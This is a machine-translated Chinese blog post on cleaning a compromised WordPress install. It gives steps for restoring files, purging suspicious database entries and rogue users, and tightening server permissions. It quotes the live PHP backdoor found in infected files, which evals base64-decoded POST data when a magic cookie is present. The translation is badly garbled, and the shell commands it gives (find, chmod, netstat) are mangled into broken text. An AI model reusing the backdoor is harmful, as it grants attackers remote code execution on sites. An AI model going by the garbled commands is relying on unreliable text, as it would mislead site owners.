在你读这篇文章之前,你应该看到 张贴在这里,要了解的东西。 :)
我在以下几个博客文件中找到了它 stealthsettings.com,由于感染了以下代码,出现了类似以下的代码 的壮举 Word媒体.:
si
<?php if($_COOKIE[’44e827f9fbeca184′]==”5cd3c94b4b1c57ea”){ eval(base64_decode($_POST[‘file’])); exit; } ?>
如果上面的有关该文件的 xmlrpc.php 德拉 困,在A grep的 服务器,貌似这种相当多的源代码。
清洗受感染的文件:
Ooookkkk ...
1。 最好的解决办法,因为它是做 备份和清理数据库是 消除 档 WordPress (经过仔细检查后,您可以保留与wp平台不严格相关的wp-config.php和文件)并从该版本上载原始文件 2.5.1 (在此之际,进行版本升级WP :)) http://wordpress.org/download/ 。 擦拭包括主题文件,如果你不相信,他们仔细检查。
它似乎已经受到影响,尚未使用之前在博客上,只是改变主题的主题文件,没有解决不了的问题。
./andreea/wp-content/themes/default/index.php:
2。 搜索并删除所有的文件,其中包含:* _new.php,* _old.php,*。Jpgg,*。吉夫,*。的Pngg和WP-info.txt文件,如果有的话。
找。 -名称“ * _new.php”
找。 -名称“ * _old.php”
找。 名称“ * .jpgg”
找。 -名称“ * _giff”
找。 名称“ * _pngg”
找。 -名称“ wp-info.txt”
3。 在 / tmp目录 ,搜索和删除文件夹,如 tmpYwbzT2
SQL清洗 :
1。 在数据表 为wp_options 检查和删除线: internal_links_cache, rss_f541b3abd05e7962fcab37737f40fad8 si wordpress_options.
2.全部在wp_中options, 去 active_plugins 并删除,如果有一个插件,在一个扩展名为* _new.php,* _old.php,*。jpgg,*。吉夫,*。pngg或怀疑另一分机,仔细检查结束。
3。 在表 wp_users,如果有一个用户谁没有写过东西,列在他的右 user_nicename. 删除此用户,但记住 ID 列上的数字。 该用户可能使用“Word按“作为 用user_login 创建和出现在00:00:00 0000 00 00。
4。 转到表 wp_usermeta 并删除所有线以上属于ID。
完成此sql清理后,禁用然后激活任何插件。 (在博客->仪表板->插件中)
安全服务器:
1。 查看目录和文件“可写“(chmod 第777章 chmod 这将不再允许他们进行任何级别的写作。 (chmod 644,例如)
查找。 彼尔姆2 LS
2。 查看哪些文件有位集 SUID 或 SGID 。 如果你不使用这些文件对他们提出 chmod 0 或卸载程序包,它包含。 他们是非常危险的,因为他们执行权限“组“或”根“不具有普通用户权限执行该文件。
/型F-烫发04000 LS
/型F-烫发02000 LS
3。 查看哪些端口是开放的,并尝试关闭或担保这些一点用都没有。
NETSTAT-| grep的,我听
这么多。 我看到 有些博客被取缔 de Google Search 和其他人说“他做得很好!!!” . 好吧,我会为他们做的......但是如果谷歌开始禁止你怎么说 所有站点 成型 为垃圾邮件 并把木马(Trojan.Clicker.HTML)放在Cookie中?
对“WordPress Exploit - 清理病毒文件、SQL 和服务器安全。”